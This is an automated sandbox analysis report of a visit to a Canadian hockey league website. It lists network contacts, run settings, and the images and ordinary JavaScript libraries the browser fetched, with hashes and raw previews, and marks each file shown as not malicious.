                                                                                                                          securepubads.g.doubleclick.netUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          239.255.255.250
                                                                                                                          unknownReserved
                                                                                                                          unknownunknownfalse
                                                                                                                          3.171.100.86
                                                                                                                          unknownUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          3.171.100.83
                                                                                                                          content.jwplatform.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          104.17.25.14
                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          185.76.79.50
                                                                                                                          virtual.urban-orthodontics.comSpain
                                                                                                                          50129TVHORADADAESfalse
                                                                                                                          104.17.24.14
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          142.250.31.156
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          142.251.163.132
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          137.117.65.222
                                                                                                                          gthlcanada.comUnited States
                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                          104.22.55.104
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          104.18.11.207
                                                                                                                          maxcdn.bootstrapcdn.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          52.217.171.9
                                                                                                                          s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          64.233.180.104
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          IP
                                                                                                                          192.168.11.20
                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                          Analysis ID:1590286
                                                                                                                          Start date and time:2025-01-13 21:58:58 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 5m 46s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                          Sample URL:https://gthlcanada.com
                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal48.win@24/359@81/30
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.253.122.94, 142.251.163.113, 142.251.163.139, 142.251.163.102, 142.251.163.138, 142.251.163.100, 142.251.163.101, 142.251.179.84, 64.233.180.102, 64.233.180.139, 64.233.180.113, 64.233.180.138, 64.233.180.100, 64.233.180.101, 142.250.80.110, 172.253.122.101, 172.253.122.102, 172.253.122.139, 172.253.122.100, 172.253.122.138, 172.253.122.113, 104.68.240.179, 172.253.115.95, 172.253.115.94, 104.18.40.153, 172.64.147.103, 142.251.16.101, 142.251.16.139, 142.251.16.100, 142.251.16.138, 142.251.16.102, 142.251.16.113, 142.251.179.95, 142.251.16.95, 142.251.163.95, 172.253.62.95, 142.251.111.95, 142.251.167.95, 142.250.31.95, 172.253.122.95, 64.233.180.95, 172.253.63.95, 172.253.122.97, 142.251.163.94, 172.253.115.97, 172.253.62.132, 142.251.16.157, 142.251.16.156, 172.253.115.155, 172.253.115.156, 142.251.179.132, 172.253.62.154, 172.253.62.157, 142.251.111.155, 142.251.111.154, 172.253.122.155, 172.253.122.156, 142.251.179.155, 142.251.179.157, 142.251.179.154, 142.25
                                                                                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, www.googleadservices.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, 8d17553e21b5bbe3db18b8f4b7e37c15.safeframe.googlesyndication.com, pagead2.googlesyndication.com, www.googleapis.com, static.ctctcdn.com.cdn.cloudflare.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, tpc.googlesyndication.com, update.googleapis.com, e8840.a.akamaiedge.net, clients.l.google.com, www.gstatic.com, secure.widget.cloud.opta.net.edgekey.net, www.google-analytics.com
                                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: https://gthlcanada.com
                                                                                                                          No simulations
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=12, height=640, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=960], baseline, precision 8, 730x435, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):66915
                                                                                                                          Entropy (8bit):7.894984580065188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:rSDsNUTofWZm6l5AZ0fmicrgUYDKDODYFMBNKF:rS8aofSl5AsmicrtYT0FmNKF
                                                                                                                          MD5:DB45C9184F115FAB5F8C1916BB5A0FEA
                                                                                                                          SHA1:B4C5B41DD3C5E6DA4333CC3C2BC48A9A37A5B04E
                                                                                                                          SHA-256:8B1886CDEEA97F8EF721DB3B6334C08563031B9E49AC3B1736720F159D908744
                                                                                                                          SHA-512:6EAB575A891430C791016F487757649712413E2AE4BA597FD0E17A90CCEA9E6E89B5973C88A204B9EBC5E8E8EA2CAC24F3577B56BAE1E3DC38F29FCE7CC94A38
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_1955700155504132096_o-730x435.jpg
                                                                                                                          Preview:......JFIF.....H.H.....yExif..MM.*.......................................................................................................(...........1...........2..........i.......................H.......H....Adobe Photoshop CS5 Windows.2020:04:09 10:16:39...........0221...................................1...............................j...........r.(.....................z...................H.......H..........Adobe_CM......Adobe.d................................................................................................................................................._...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..gW.M2......R...5...Hq..6..MY.}I.tz.4..h{..W*.._.L...P..V&.2
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (3533)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):222749
                                                                                                                          Entropy (8bit):5.453364917537705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:Giwcm/IpG4DMcdc/Fa9BDrk7m7U7ozJgs:yP/I5jMI
                                                                                                                          MD5:ADB4D93F80755314547B699C181145BD
                                                                                                                          SHA1:87BBCFD9E29A8BBB0ED8177AEB0F930499592AB7
                                                                                                                          SHA-256:AF6B15D8917BD5AB039B73DB5F939C17DF1ACA2ACF7D4AC9D8F44A005EDAF6D6
                                                                                                                          SHA-512:39DD81FFB91A9340D97B77E689B06D7D45201511CDF44352F3F1406AC3FEEAF2B786ECF13F08ADD5F0725610ECC3F24B2E87D5A8518CC2818F765921A0CA626C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Lg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Lg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC 2019 (Macintosh), datetime=2021:07:17 00:12:48], baseline, precision 8, 730x365, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):19915
                                                                                                                          Entropy (8bit):6.646330506112449
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HfyqsHabEYNMtKwTDknWrg/g4X1XFJRJy4a4vKRVvSjajWd1PdKHQx7DwMyo1jKO:iYNg7Enq0JNFJRJFa4mtmlmQx7hyfy
                                                                                                                          MD5:4FA3EB7376BCD47BD40D24B15FDF99F4
                                                                                                                          SHA1:4C85709D56F9DA3EA9243FFA7624CAFF1EDB4FB0
                                                                                                                          SHA-256:6D2681126F64029C9FCD345FA4B2F4A009D7BDB6536DFBA287F6454A1F39F6EF
                                                                                                                          SHA-512:75A0B10F1C0084714100F2566543A8F16587E78020ABDFCA068A595AEC59F2E4AB115CA559BB9696521A2F87D59EDF44D443D8052E83180812F919CEFB626C03
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg
                                                                                                                          Preview:......JFIF.....,.,.....AExif..MM.*.............................b...........j.(...........1.....$...r.2...........i.................,.......,....Adobe Photoshop CC 2019 (Macintosh).2021:07:17 00:12:48........................................................................&.............(.....................6...................,.......,..........Adobe_CM......Adobe.d.................................................................................................................................................P...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.IJI$.R.I$..;...2.v.i}.=.....5+o...u....]{...A-.....Ey.......-......_M>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):54810
                                                                                                                          Entropy (8bit):7.974013751861199
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:w9hfGpUyegCDWc/lIVqCQI2qxMxSQk421wdjxze:WfGszDWc/JI2oMljAwj1e
                                                                                                                          MD5:EE4428F72F40A9CD584A971CFC0A3999
                                                                                                                          SHA1:F75C7F4EA031B3904C6505B20F608CF1A205917B
                                                                                                                          SHA-256:83C3A796A335CBF3C2E78B341110E8CA0332F1E2179B04E374822CC2A496FB66
                                                                                                                          SHA-512:5D5B6CA10EA2BD515214A6A5288D11C3182D5450E9739B9A9FC7D1169F8C3FA9E68201C9ADA32382BC96A5E29DA42E6AAEAA64687BBE8F07825DD07B9ED0748B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................Y..........................!1..AQ."a.2q...#BR..3.$CSbr...%4......DTcs...&5d....'Et...Ue..................................F........................!1.A..Q...."2aq....BR......#Cb..$3DSr..%T..............?..q.U.o<=E.g.....iK.<n.>U.'....\..s.S...#i......!'.. H.W65...........!q...M.C.@)..".X$\.4b...XC...6.xpv...)..^..iM.2.........&...-kB...-....+z.`....a....){.f9....y.L.....J"..M..j:..4...n..(.z......?........Tk......R[.2-.X......X.A$d..4...&....j.OJl%Z..TC..<:..f..0..f..".L....G..@.!...)..H.2..`..I'#I.(w...HE..@.UK.9*.u.*..m..#v.~..=".0]Q n..|<.._.....W.`.!.D..A..!.. ./m .m.Rl<.H:$k.....A...t....X...R.m.=.t@.Z.h-z..B....X..`....K..o.......?.=Q....."..]..-_H:.F.W..CO..."....G...H".~..eCq.k...YQ ..h`.{.....r..I..R.H..q.P7Q*.>j.^J.....R_.ayT2/...1g>.i.C..z.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 730x548, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):111059
                                                                                                                          Entropy (8bit):7.980192975593345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:2Octox3k18HquGAn/naQ9HawK5PXBfjF0ChMTKn:73k4PPacRgXhjF0h+
                                                                                                                          MD5:95A8B191AC15E774984B63D2BA3E3E23
                                                                                                                          SHA1:F9F9ADB3C6A84FA3A7CA99A714054C78DE741095
                                                                                                                          SHA-256:46911809ACD00B8B06BBDCB6A68A0261CBE281A2043D8046E6B5DDD448A6308F
                                                                                                                          SHA-512:1EB7A05DDB94C2D66B46EA04BE62E5EB264CB1271EE2017036F7254B838576FC9125BE66AB52B0A2C96D31687E61C600D7E4A6AD8B2A7EE1042B35D4852DEC17
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/06/26135230/GTHL-PrideParade2023-730x548.jpeg
                                                                                                                          Preview:......JFIF.....H.H.....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......$....".........................................P.........................!.1.AQ.."aq.2...#BR..3b..$Cr.....%4S....cs...&6De....................................9........................!.1A."Q2a..q..#B.....3..$Rb..CS............?..4....#:@F.Z1..|.(.]Q.[...Q.BWn....F...ri......l....0T...j.o..0U.;_..>...q...?...:.L..dy'D`....}.k.u}....B<C..(......4}.Z...{..#fRF.;....[..k6..MF....$...d.JwM.....B../1#F..b...i.wP..X.5'.l....W..$...R......i==$S.7...QH..q.......=7.:..e4.H.w......._W...b.L...,.=?PP....1...U.<....}..A..s........|T'......O.ur..Yk..#.h..B.{.[<zS....k).f.f..._l!..z_l...vV[X5.^.2.....@...H...L...........SK.4...5..&.Y..5.r=)u=.h.,.......d.C..Z.Q...t2,...&.?1L...I..Gyg.n..`....Z..........x.d........O.Z.z...*..F.4.s..6H.M.#.PI...I#..5.....G....b;h"....G.]..W.9 .`...A.'...s......_........R._t
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:11:26 12:51:52], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):113124
                                                                                                                          Entropy (8bit):7.8382193039209405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:zvq5voHJoF8eaqjLnR+FB4EApzbBvJBycIEr:MvsgsyO4NpzbBxBJ5r
                                                                                                                          MD5:D1893F6C477BE37E8388DC8B656B9DEF
                                                                                                                          SHA1:E91C6CD6623532A3A62F2E247699A7B797F99885
                                                                                                                          SHA-256:5D4952D787E02CC22A117C1CB8951641B2F09BBF63F06BFC8E8BC3FE651A51F0
                                                                                                                          SHA-512:AB9851E02520891653A631AF47A1868ACAACDB71AD6B50A9B7BB35B123EB27AA2E68572D8509615C6E62DBD4087AE7E1AC9A7ED4AD7A4B64A904549864BF2C66
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg
                                                                                                                          Preview:......JFIF............MGExif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:11:26 12:51:52.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................48..........48..................................................................................................1...........2....... ...4.......@...5.......X............... .......2024:11:24 15:20:29.2024:11:24 15:20:29.-05:00..-05:00..-05:00...=..@B...53.@B..................?.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................}I..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):16
                                                                                                                          Entropy (8bit):3.875
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:H+uZYn:euZYn
                                                                                                                          MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                          SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                          SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                          SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTI4LjAuNjYxMy4xMjASGQnKq4GMYLhtuhIFDZFhlU4hQwGPiZ6Nh0w=?alt=proto
                                                                                                                          Preview:CgkKBw2RYZVOGgA=
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (3846)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):653479
                                                                                                                          Entropy (8bit):4.554223980280399
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:E0jAzaWuIbUsNeTN8S571aZsqa9QhiOwaELasD:XNIbQqsD
                                                                                                                          MD5:D1D3B8A5E9BB121D66BD3381AD17ECF1
                                                                                                                          SHA1:50655C7FF064BDB559BF21FF07967247798108BD
                                                                                                                          SHA-256:FCEC6E1FB0A351B2ABDAFB91319F202636CF8325F9FE21A0FF702EBDF5F8AF13
                                                                                                                          SHA-512:D3CEDC991EF892B1BE71959BD64F262E5CD784813C9BFDC367A198F864EF49BF6EC21044D8911E7AFF027EE1E387742F3A33F21AC9DB75A606C147AAC8249735
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function() {. var $, Ad300, ArenaTable, BaseTableMixin, BracketApp, BracketChampion, BracketModal, BracketModalGame, BracketPage, BracketRound, BracketSeries, BracketSeriesTeam, CSASeasonViewSelect, CoachesTable, DivisionStandings, GameBox, GameDaySelect, GamecentreApp, GamecentreBoxscoreTab, GamecentreHelperMixin, GamecentreIcerink, GamecentreMatchup, GamecentrePage, GamecentrePlayByPlayTab, GamecentrePreviewTab, GoalieStatsTable, GoaliesTable, HeadToHeadTable, HomeAwayTable, HomeAwayViewSelect, IcerinkPlayPopup, IcerinkPoint, ItemMixin, Last10Table, LastFiveTable, LeadersCategory, LeadersPage, LeagueLeaders, LeagueStars, LeftMenu, LeftMenuItem, LegacyGoalieStatsTable, LongestStreaksTable, MVPSummary, MatchCenterHighlightsTab, MatchCenterMatchStatsTab, MatchCenterPreviewTab, MatchCentreApp, MatchCentreHeader, MatchCentrePage, MatchUpTable, MatchupLinks, MatchupScorecard, MatchupSummary, MatchupTeam, Modal, MonthSelect, MoreGoaliesTable, NetworkHeader, OHLLegacyPlayerStatsTable, OHLS
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 24.0 (Macintosh), datetime=2023:07:13 14:59:22], baseline, precision 8, 730x365, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):98422
                                                                                                                          Entropy (8bit):7.91678916493404
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DnN1JdYX3uka1zQ/uysX/bsWrzzDFSGzm33SAzGBvm/5K2+no+VywG9T/bO717kQ:zNnSuk3/YX//rzVl+TGcxN+V9GxK7bs8
                                                                                                                          MD5:3505B35843BE9FBC0DFA7AF75C0AE9BB
                                                                                                                          SHA1:1872844EA73BF462A60DC9DAB6FBFFEC23779931
                                                                                                                          SHA-256:F0B27156B2C875CDF14BE02222BC72808F79E4771848A232F8C14D7DEF277AAD
                                                                                                                          SHA-512:C853EE1C68E722AA44FBCA2604F07E5FACE85B623FBAD20C6147EDA780CEF69D8A6DD8B71E99C6907DEBF66FB752D883031C09F981C74CCF710327A3AAD06C5E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/07/13145939/5HealthySnacks-1024x512jpg-730x365.jpg
                                                                                                                          Preview:......JFIF.....,.,......Exif..MM.*.............................b...........j.(...........1.....!...r.2...........i.................,.......,....Adobe Photoshop 24.0 (Macintosh).2023:07:13 14:59:22......................................................................."...........*.(.....................2...................,.......,..........Adobe_CM......Adobe.d.................................................................................................................................................P...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....K...}a.....n...9..S.lc......H..J.sHld. .[.}?.w.t..l.N....x...f.Sz......@.D....}?....i..]...c..I..hk..}/r8....8i.*M.5I2$...'.:P..U+
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28446
                                                                                                                          Entropy (8bit):7.85260160706766
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:UIlelqNpA50uHojVf/v4lVlWdJeJyNSJjO1ZAliYPl5IZmG:U0b40yCf4lVlWOAN2qZciY/Wd
                                                                                                                          MD5:63BD1E837569DDA67BB8266E8FAEFB23
                                                                                                                          SHA1:F136F104C28F681DC8D4B0CE737E8C60822B3080
                                                                                                                          SHA-256:11AF23532B3E62998F97E637690ACB95B5E9C29721C0947EB5613CF6EEB1619C
                                                                                                                          SHA-512:9513C00EA8D0B6FCF5F3F96C64C8B68EE3BD364CBA25A964B1C617A08B270D24164B8C89E55E5FE770E9A9A83C256632A7C841170B5521AE1D349DDF8E75F6FD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................Z.........................1..!Q..A.."Waq......2.....#45BRUs....6TVbrt.$%37CGSu........D.c..................................I..........................!1A..Qaq..."R.....2Sbcr......#4B..5..3CD.6s..............?.. ..s...............p....YSR.......{.....cYQ.._..Y...I..+..;.-....O.K.{............*.../...>k.u.._^*Qu>..e.r.*.%...~-.*.in=.q.f..n.._.....H]In....<...X..............Cu%.7PX;R.v..H.....*X.%..$......U....P......[...R.%..K...$;@..............U..................................xa..VA...H.kZ.....c.&....P.d...W.i.,......r'j.....G.8...cx5.f.T.U..1....Q...;zy[..'/..i.u9o*[...].?.F.....t..........#?|..........Ip.....*jX...Z...a.....*....%..?..K..\....l....|._........2K..........9.....E.......j..V..9e.J...l.[.ZU...{..^........BB..b...y.[...-..H..X..........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):28
                                                                                                                          Entropy (8bit):4.280394654123195
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Iu6CxICkY:TPkY
                                                                                                                          MD5:294DA74724D32B2F8F0B2D73540A23CA
                                                                                                                          SHA1:4F504BDF6DEA6EC9C2B0B7F4A1DBC655263A9878
                                                                                                                          SHA-256:BF35EA88B3B508A531B530F09F894950DD9BD2FEBE38865EC86108EE4E327C9E
                                                                                                                          SHA-512:F373CD9A08999FF67E0F5E9166D097D4156ED3B63D7EB8F57386AE941ECACBAFCF429ABEE3A768BCEC0286FF74477E30954A8D081AC23AECE8E6C6246818167D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTI4LjAuNjYxMy4xMjASIAlCZCqyMDqWUBIFDe5qUokSBQ1TWkfFIaNXFApGSL3e?alt=proto
                                                                                                                          Preview:ChIKBw3ualKJGgAKBw1TWkfFGgA=
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5520)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5566
                                                                                                                          Entropy (8bit):5.240611776640752
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yooivd0TDZBx/ZcxYSWFSqDdBfJqbohjWcRSVJm/dK8249rz1H:yooHDT5vSSzDdBfQbsjWsSVJm/IUDH
                                                                                                                          MD5:C5909AD4EF00C7CF19155394F7E77AA5
                                                                                                                          SHA1:3DAB4FD10C091F64BFEA4A8E0EF0A50EDF4A602B
                                                                                                                          SHA-256:561F002545E54F4A58FB3A5D4BC881B8D5F55D41FB9BC861A32BB0C8075F0236
                                                                                                                          SHA-512:834C76F6BB0F1CF4A7C145399FE9C5E343DEC1C65DBC745D6C36E926F0398DD67DF8BCA85D1322CDDC80B5C35005D504C319DEA81FFA0F55E2157384180307EB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! jsTimezoneDetect - v1.0.6 - 2014-02-25 */.!function(a){var b=function(){"use strict";var a="s",c=function(a){var b=-a.getTimezoneOffset();return null!==b?b:0},d=function(a,b,c){var d=new Date;return void 0!==a&&d.setFullYear(a),d.setMonth(b),d.setDate(c),d},e=function(a){return c(d(a,0,2))},f=function(a){return c(d(a,5,2))},g=function(a){var b=a.getMonth()>7,d=b?f(a.getFullYear()):e(a.getFullYear()),g=c(a),h=0>d,i=d-g;return h||b?0!==i:0>i},h=function(){var b=e(),c=f(),d=b-c;return 0>d?b+",1":d>0?c+",1,"+a:b+",0"},i=function(){var a=h();return new b.TimeZone(b.olson.timezones[a])},j=function(a){var b=new Date(2010,6,15,1,0,0,0),c={"America/Denver":new Date(2011,2,13,3,0,0,0),"America/Mazatlan":new Date(2011,3,3,3,0,0,0),"America/Chicago":new Date(2011,2,13,3,0,0,0),"America/Mexico_City":new Date(2011,3,3,3,0,0,0),"America/Asuncion":new Date(2012,9,7,3,0,0,0),"America/Santiago":new Date(2012,9,3,3,0,0,0),"America/Campo_Grande":new Date(2012,9,21,5,0,0,0),"America/Montevideo":new Dat
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (803)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):624664
                                                                                                                          Entropy (8bit):4.9657897746371535
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:Op7pQA3hGtmOKGbndpLemIVT+t8V6CX6Y3BlPtt9vRh1uuAAEf4jdEFH2RPOSN57:FFIVT+t8V6s6Y3BlPtt9vRh1uuAAEf4n
                                                                                                                          MD5:AE2111EDEE5B0480B4967B66B95AA2FC
                                                                                                                          SHA1:8EE44B0880B31AA0042423A212C537732ED8B548
                                                                                                                          SHA-256:2FCECB85081C80A441EB0316EB39732E436875C554928F45F8BC509CE0F2F8D8
                                                                                                                          SHA-512:F9028E20289CC12CC1E4EA086E2B085CF7D1405B8F43A51F2ACC0C772DA337F206CD60404646249864CF11C1D205DF3D3F1DC53E1B28B2CEF5DCF2D90A4C0BA9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/react/0.12.1/react-with-addons.js
